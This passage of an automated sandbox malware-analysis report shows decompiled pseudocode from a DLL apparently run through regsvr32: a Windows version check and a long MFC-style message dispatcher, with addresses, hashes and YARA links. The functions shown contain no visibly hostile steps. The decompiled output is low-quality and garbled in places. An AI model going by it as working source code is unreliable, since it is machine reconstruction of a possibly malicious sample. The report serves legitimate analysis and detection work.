                                                                                                            • String ID:
                                                                                                            • API String ID: 3716621309-0
                                                                                                            • Opcode ID: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                                                            • Instruction ID: 5de781b028f8a4fce12e3c0fa49c43aff6f22c7add5c7a501000866edff81116
                                                                                                            • Opcode Fuzzy Hash: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                                                            • Instruction Fuzzy Hash: FFF02B3A20021F6EDB13AA55CC81FA93A55DF406E1F024135FD04AF252DE71EE129290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001100 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10001100() {
				struct _OSVERSIONINFOA _v148;
				long _t6;

				_v148.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v148);
				if(_v148.dwPlatformId != 2) {
					L2:
					_t6 = E10001090;
				} else {
					_t6 = E100010F0;
					if(_v148.dwMajorVersion < 5) {
						goto L2;
					}
				}
				InterlockedExchange(0x1004b0a0, _t6);
				return  *0x1004b0a0();
			}





                                                                                                            0x1000110a
                                                                                                            0x10001112
                                                                                                            0x1000111d
                                                                                                            0x1000112b
                                                                                                            0x1000112b
                                                                                                            0x1000111f
                                                                                                            0x10001124
                                                                                                            0x10001129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001129
                                                                                                            0x10001136
                                                                                                            0x10001148

                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32 ref: 10001112
                                                                                                            • InterlockedExchange.KERNEL32(1004B0A0,10001090), ref: 10001136
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlockedVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2700998522-0
                                                                                                            • Opcode ID: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                                                            • Instruction ID: cbef01c832245ed46ef0d161ca004d6dcd336c7d999a9848a1027e40418eb20f
                                                                                                            • Opcode Fuzzy Hash: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                                                            • Instruction Fuzzy Hash: E8E08C304043889FF320EB24CD48B9E76F5FB08282FC04828F2A5C200AD734494ACB47
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10023973 Relevance: 1.9, APIs: 1, Instructions: 440COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 22%
                                                                                                            			E10023973(intOrPtr* __ecx) {
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				unsigned int _t150;
				signed int _t152;
				signed int _t156;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				unsigned int _t163;
				signed int _t167;
				signed int _t171;
				unsigned int _t174;
				signed int _t175;
				signed int _t179;
				signed int _t180;
				signed int* _t184;
				signed int _t186;
				signed int _t194;
				unsigned int _t204;
				void* _t206;

				_t187 = __ecx;
				E10011BF0(0x1003a61c, _t206);
				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
				_t179 =  *(_t206 + 8);
				_t201 = __ecx;
				if(_t179 != 0x111) {
					if(_t179 != 0x4e) {
						_t204 =  *(_t206 + 0x10);
						if(_t179 == 6) {
							E100233A0(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E100220EE(_t206, _t204));
						}
						if(_t179 != 0x20) {
							L10:
							_t141 =  *(_t201 + 0x48);
							if(_t141 == 0) {
								L19:
								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
								 *(_t206 - 0x14) = _t180;
								E10037A1B(7);
								_t184 = 0x1004d5f8 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
								_t146 =  *(_t206 - 0x14);
								if( *(_t206 + 8) !=  *_t184) {
									L24:
									 *_t184 =  *(_t206 + 8);
									_t184[2] = _t146;
									while(1) {
										if(_t146 == 0) {
											break;
										}
										_t147 =  *(_t206 - 0x14);
										_push(0);
										_push(0);
										if( *(_t206 + 8) >= 0xc000) {
											_t148 =  *(_t147 + 4);
											while(1) {
												_push(0xc000);
												_push(_t148);
												_t149 = E10020CD3();
												 *(_t206 + 0x10) = _t149;
												if(_t149 == 0) {
													break;
												}
												_t150 =  *(_t206 + 0x10);
												_t152 =  *(_t206 + 0x10);
												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
													_t184[1] = _t152;
													E10037A7E(7);
													L105:
													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
													L106:
													 *(_t206 - 0x10) = _t156;
													goto L107;
												}
												_push(0);
												_push(0);
												_t148 = _t152 + 0x18;
											}
											L34:
											_t146 =  *( *(_t206 - 0x14));
											 *(_t206 - 0x14) = _t146;
											continue;
										}
										_push( *(_t206 + 8));
										_push( *(_t147 + 4));
										_t161 = E10020CD3();
										 *(_t206 + 0x10) = _t161;
										if(_t161 == 0) {
											goto L34;
										}
										_t184[1] = _t161;
										E10037A7E(7);
										L28:
										_t163 =  *(_t206 + 0x10);
										_t184 =  *(_t163 + 0x14);
										_t147 =  *(_t163 + 0x10);
										_t194 =  *(_t163 + 0x10) - 1;
										if(_t194 > 0x40) {
											goto L107;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M10023E7A))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10029068());
												goto L55;
											case 1:
												_push( *(__ebp + 0xc));
												goto L55;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L59;
											case 3:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L84;
											case 4:
												_push(__esi);
												L55:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 5:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E10021613(__ebp - 0x74, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x58) = __eax;
												__eax = E10022115();
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x48);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E1001E69B(__eax + 0x20,  *(__ebp - 0x58));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x74;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x10) = __ebp - 0x24;
												 *(__ebp - 4) = 0;
												__eax = E10022977(__ebp - 0x74);
												goto L51;
											case 6:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												_t89 = __ebp - 0x20;
												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
												__eflags =  *_t89;
												 *(__ebp - 0x10) = __ebp - 0x24;
												L51:
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												__eax = E100290DE(__ebp - 0x24);
												goto L107;
											case 7:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L58;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L84;
											case 9:
												_push(__esi);
												_push( *(__ebp + 0xc));
												goto L85;
											case 0xa:
												_push(__esi);
												_push(E10026280());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L58:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L59:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xb:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L91;
											case 0xd:
												_push(__esi);
												goto L88;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L63;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L63;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E100220EE(__ebp, __esi));
												L88:
												_push( *(__ebp + 0xc));
												goto L89;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x13:
												_push(E100220EE(__ebp,  *(__ebp + 0xc)));
												_push(E100220EE(__ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												__eflags = _t107;
												__eax = 0 | _t107;
												goto L67;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10029068();
												goto L69;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L69;
											case 0x16:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L67;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L74;
											case 0x18:
												_push(__esi);
												L74:
												__eax = E100220EE(__ebp);
												L69:
												_push(__eax);
												goto L91;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L77;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L77:
												_push(__eax);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L67;
											case 0x1b:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												L63:
												_push(__eax);
												goto L89;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L93;
											case 0x1d:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x27;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __cx;
												 *(__ebp + 0xc) = __cx;
												if(__eax != 0x27) {
													_push( *(__ebp + 0xc));
													_push( *((intOrPtr*)(__ebp + 8)));
													L89:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L107;
												}
												_push(E100220EE(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L98;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L84:
												_push(__eax);
												L85:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L93:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L67:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x23:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L100:
												__eflags = _t175;
												if(_t175 != 0) {
													goto L107;
												}
												goto L37;
											case 0x24:
												goto L107;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L107;
												}
												L37:
												_t159 = 0;
												__eflags = 0;
												goto L38;
										}
									}
									_t54 =  &(_t184[1]);
									 *_t54 = _t184[1] & _t146;
									E10037A7E(7);
									goto L37;
								}
								if(_t146 != _t184[2]) {
									goto L24;
								}
								_t186 = _t184[1];
								 *(_t206 + 0x10) = _t186;
								E10037A7E(7);
								if(_t186 == 0) {
									goto L37;
								}
								if( *(_t206 + 8) < 0xc000) {
									goto L28;
								}
								goto L105;
							}
							if( *(_t141 + 0x70) <= 0) {
								goto L19;
							}
							if(_t179 < 0x200) {
								L14:
								if(_t179 < 0x100) {
									L16:
									if(_t179 < 0x281) {
										goto L19;
									}
									if(_t179 > 0x291) {
										goto L19;
									}
									L18:
									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
									if(_t167 != 0) {
										goto L107;
									}
									goto L19;
								}
								if(_t179 <= 0x10f) {
									goto L18;
								}
								goto L16;
							}
							if(_t179 <= 0x209) {
								goto L18;
							}
							goto L14;
						} else {
							_t171 = E10023401(_t201, _t204, _t204 >> 0x10);
							if(_t171 != 0) {
								L98:
								 *(_t206 - 0x10) = 1;
								L107:
								_t157 =  *(_t206 + 0x14);
								if(_t157 != 0) {
									 *_t157 =  *(_t206 - 0x10);
								}
								_t159 = 1;
								L38:
								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
								return _t159;
							}
							goto L10;
						}
					}
					_t174 =  *(_t206 + 0x10);
					if( *_t174 == 0) {
						goto L37;
					}
					_push(_t206 - 0x10);
					_push(_t174);
					_push( *((intOrPtr*)(_t206 + 0xc)));
					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L100;
				}
				_push( *(_t206 + 0x10));
				_push( *((intOrPtr*)(_t206 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L37;
				}
				goto L98;
			}

























                                                                                                            0x10023973
                                                                                                            0x10023978
                                                                                                            0x10023980
                                                                                                            0x10023985
                                                                                                            0x10023990
                                                                                                            0x10023992
                                                                                                            0x100239b2
                                                                                                            0x100239da
                                                                                                            0x100239dd
                                                                                                            0x100239ea
                                                                                                            0x100239ea
                                                                                                            0x100239f2
                                                                                                            0x10023a0c
                                                                                                            0x10023a0c
                                                                                                            0x10023a11
                                                                                                            0x10023a65
                                                                                                            0x10023a6c
                                                                                                            0x10023a6e
                                                                                                            0x10023a7c
                                                                                                            0x10023a87
                                                                                                            0x10023a90
                                                                                                            0x10023a93
                                                                                                            0x10023abd
                                                                                                            0x10023ac0
                                                                                                            0x10023ac2
                                                                                                            0x10023b4c
                                                                                                            0x10023b4e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ad1
                                                                                                            0x10023ad4
                                                                                                            0x10023ad6
                                                                                                            0x10023ad8
                                                                                                            0x10023b12
                                                                                                            0x10023b32
                                                                                                            0x10023b32
                                                                                                            0x10023b37
                                                                                                            0x10023b38
                                                                                                            0x10023b3f
                                                                                                            0x10023b42
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b17
                                                                                                            0x10023b22
                                                                                                            0x10023b25
                                                                                                            0x10023e4d
                                                                                                            0x10023e50
                                                                                                            0x10023e55
                                                                                                            0x10023e61
                                                                                                            0x10023e63
                                                                                                            0x10023e63
                                                                                                            0x00000000
                                                                                                            0x10023e63
                                                                                                            0x10023b2b
                                                                                                            0x10023b2d
                                                                                                            0x10023b2f
                                                                                                            0x10023b2f
                                                                                                            0x10023b44
                                                                                                            0x10023b47
                                                                                                            0x10023b49
                                                                                                            0x00000000
                                                                                                            0x10023b49
                                                                                                            0x10023ada
                                                                                                            0x10023add
                                                                                                            0x10023ae0
                                                                                                            0x10023ae7
                                                                                                            0x10023aea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023aee
                                                                                                            0x10023af1
                                                                                                            0x10023af6
                                                                                                            0x10023af6
                                                                                                            0x10023af9
                                                                                                            0x10023afc
                                                                                                            0x10023aff
                                                                                                            0x10023b05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b0b
                                                                                                            0x00000000
                                                                                                            0x10023b71
                                                                                                            0x10023b79
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b7f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b98
                                                                                                            0x10023b99
                                                                                                            0x10023b9c
                                                                                                            0x10023ba0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023baa
                                                                                                            0x10023bae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c7e
                                                                                                            0x10023c7f
                                                                                                            0x10023c7f
                                                                                                            0x10023c81
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023bb8
                                                                                                            0x10023bc0
                                                                                                            0x10023bc3
                                                                                                            0x10023bc7
                                                                                                            0x10023bca
                                                                                                            0x10023bcd
                                                                                                            0x10023bd2
                                                                                                            0x10023bd4
                                                                                                            0x10023bd7
                                                                                                            0x10023bd8
                                                                                                            0x10023bdc
                                                                                                            0x10023bdf
                                                                                                            0x10023be4
                                                                                                            0x10023be6
                                                                                                            0x10023be8
                                                                                                            0x10023beb
                                                                                                            0x10023bed
                                                                                                            0x10023bf2
                                                                                                            0x10023bf5
                                                                                                            0x10023bfa
                                                                                                            0x10023bfc
                                                                                                            0x10023bfe
                                                                                                            0x10023bfe
                                                                                                            0x10023bfc
                                                                                                            0x10023c01
                                                                                                            0x10023c01
                                                                                                            0x10023c04
                                                                                                            0x10023c05
                                                                                                            0x10023c06
                                                                                                            0x10023c09
                                                                                                            0x10023c0a
                                                                                                            0x10023c0c
                                                                                                            0x10023c0e
                                                                                                            0x10023c12
                                                                                                            0x10023c16
                                                                                                            0x10023c19
                                                                                                            0x10023c1c
                                                                                                            0x10023c20
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c27
                                                                                                            0x10023c2f
                                                                                                            0x10023c32
                                                                                                            0x10023c35
                                                                                                            0x10023c38
                                                                                                            0x10023c3b
                                                                                                            0x10023c3c
                                                                                                            0x10023c3e
                                                                                                            0x10023c45
                                                                                                            0x10023c47
                                                                                                            0x10023c47
                                                                                                            0x10023c47
                                                                                                            0x10023c4b
                                                                                                            0x10023c4e
                                                                                                            0x10023c4e
                                                                                                            0x10023c52
                                                                                                            0x10023c55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c62
                                                                                                            0x10023c65
                                                                                                            0x10023c67
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c71
                                                                                                            0x10023c74
                                                                                                            0x10023c75
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c88
                                                                                                            0x10023c89
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023c91
                                                                                                            0x10023c97
                                                                                                            0x10023c98
                                                                                                            0x10023c9b
                                                                                                            0x10023c9b
                                                                                                            0x10023c9e
                                                                                                            0x10023c9e
                                                                                                            0x10023c9f
                                                                                                            0x10023ca3
                                                                                                            0x10023ca3
                                                                                                            0x10023ca4
                                                                                                            0x10023ca6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023cad
                                                                                                            0x10023caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023cb6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023cbe
                                                                                                            0x10023cc1
                                                                                                            0x10023cc1
                                                                                                            0x10023cc4
                                                                                                            0x10023cc5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023cd1
                                                                                                            0x10023cd4
                                                                                                            0x10023cd7
                                                                                                            0x10023cd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ce2
                                                                                                            0x10023ce3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b8d
                                                                                                            0x10023dcb
                                                                                                            0x10023dcb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dc1
                                                                                                            0x10023dc3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023cf3
                                                                                                            0x10023cfa
                                                                                                            0x10023cfb
                                                                                                            0x10023cfd
                                                                                                            0x10023d00
                                                                                                            0x10023d00
                                                                                                            0x10023d00
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d09
                                                                                                            0x10023d0c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d17
                                                                                                            0x10023d1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d26
                                                                                                            0x10023d27
                                                                                                            0x10023d2a
                                                                                                            0x10023d2b
                                                                                                            0x10023d2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d3a
                                                                                                            0x10023d3b
                                                                                                            0x10023d3b
                                                                                                            0x10023d11
                                                                                                            0x10023d11
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d47
                                                                                                            0x10023d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d4d
                                                                                                            0x10023d50
                                                                                                            0x10023d53
                                                                                                            0x10023d56
                                                                                                            0x10023d57
                                                                                                            0x10023d57
                                                                                                            0x10023d5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d62
                                                                                                            0x10023d66
                                                                                                            0x10023cc9
                                                                                                            0x10023cc9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d73
                                                                                                            0x10023d76
                                                                                                            0x10023d78
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d85
                                                                                                            0x10023d88
                                                                                                            0x10023d8b
                                                                                                            0x10023d8e
                                                                                                            0x10023d91
                                                                                                            0x10023d94
                                                                                                            0x10023da5
                                                                                                            0x10023da8
                                                                                                            0x10023dce
                                                                                                            0x10023dce
                                                                                                            0x10023dd0
                                                                                                            0x00000000
                                                                                                            0x10023dd0
                                                                                                            0x10023d9c
                                                                                                            0x10023d9d
                                                                                                            0x10023da0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dd7
                                                                                                            0x10023dd8
                                                                                                            0x10023dd8
                                                                                                            0x10023dda
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e06
                                                                                                            0x10023e07
                                                                                                            0x10023e0a
                                                                                                            0x10023e0c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dad
                                                                                                            0x10023db0
                                                                                                            0x10023db3
                                                                                                            0x10023db6
                                                                                                            0x10023db7
                                                                                                            0x10023db7
                                                                                                            0x10023db8
                                                                                                            0x10023db8
                                                                                                            0x10023dba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023de1
                                                                                                            0x10023de4
                                                                                                            0x10023de5
                                                                                                            0x10023de5
                                                                                                            0x10023de8
                                                                                                            0x10023de8
                                                                                                            0x10023de9
                                                                                                            0x10023d03
                                                                                                            0x10023d03
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023df2
                                                                                                            0x10023df5
                                                                                                            0x10023df8
                                                                                                            0x10023dfb
                                                                                                            0x10023dfc
                                                                                                            0x10023dfc
                                                                                                            0x10023dfd
                                                                                                            0x10023e00
                                                                                                            0x10023e00
                                                                                                            0x10023e02
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e17
                                                                                                            0x10023e1d
                                                                                                            0x10023e1e
                                                                                                            0x10023e1f
                                                                                                            0x10023e22
                                                                                                            0x10023e22
                                                                                                            0x10023e25
                                                                                                            0x10023e26
                                                                                                            0x10023e2a
                                                                                                            0x10023e2b
                                                                                                            0x10023e2d
                                                                                                            0x10023e2f
                                                                                                            0x10023e32
                                                                                                            0x10023e32
                                                                                                            0x10023e34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e3b
                                                                                                            0x10023e3d
                                                                                                            0x10023e3f
                                                                                                            0x10023e41
                                                                                                            0x10023e44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b5e
                                                                                                            0x10023b5e
                                                                                                            0x10023b5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b0b
                                                                                                            0x10023b54
                                                                                                            0x10023b54
                                                                                                            0x10023b59
                                                                                                            0x00000000
                                                                                                            0x10023b59
                                                                                                            0x10023a98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a9a
                                                                                                            0x10023a9f
                                                                                                            0x10023aa2
                                                                                                            0x10023aa9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ab8
                                                                                                            0x10023a17
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a1f
                                                                                                            0x10023a29
                                                                                                            0x10023a2f
                                                                                                            0x10023a39
                                                                                                            0x10023a3f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a47
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a49
                                                                                                            0x10023a57
                                                                                                            0x10023a5f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a5f
                                                                                                            0x10023a37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a37
                                                                                                            0x10023a27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100239f4
                                                                                                            0x100239ff
                                                                                                            0x10023a06
                                                                                                            0x10023e0e
                                                                                                            0x10023e0e
                                                                                                            0x10023e66
                                                                                                            0x10023e66
                                                                                                            0x10023e6b
                                                                                                            0x10023e70
                                                                                                            0x10023e70
                                                                                                            0x10023e74
                                                                                                            0x10023b60
                                                                                                            0x10023b66
                                                                                                            0x10023b6e
                                                                                                            0x10023b6e
                                                                                                            0x00000000
                                                                                                            0x10023a06
                                                                                                            0x100239f2
                                                                                                            0x100239b4
                                                                                                            0x100239ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100239c5
                                                                                                            0x100239c6
                                                                                                            0x100239c7
                                                                                                            0x100239cc
                                                                                                            0x00000000
                                                                                                            0x100239cc
                                                                                                            0x10023994
                                                                                                            0x10023999
                                                                                                            0x100239a4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
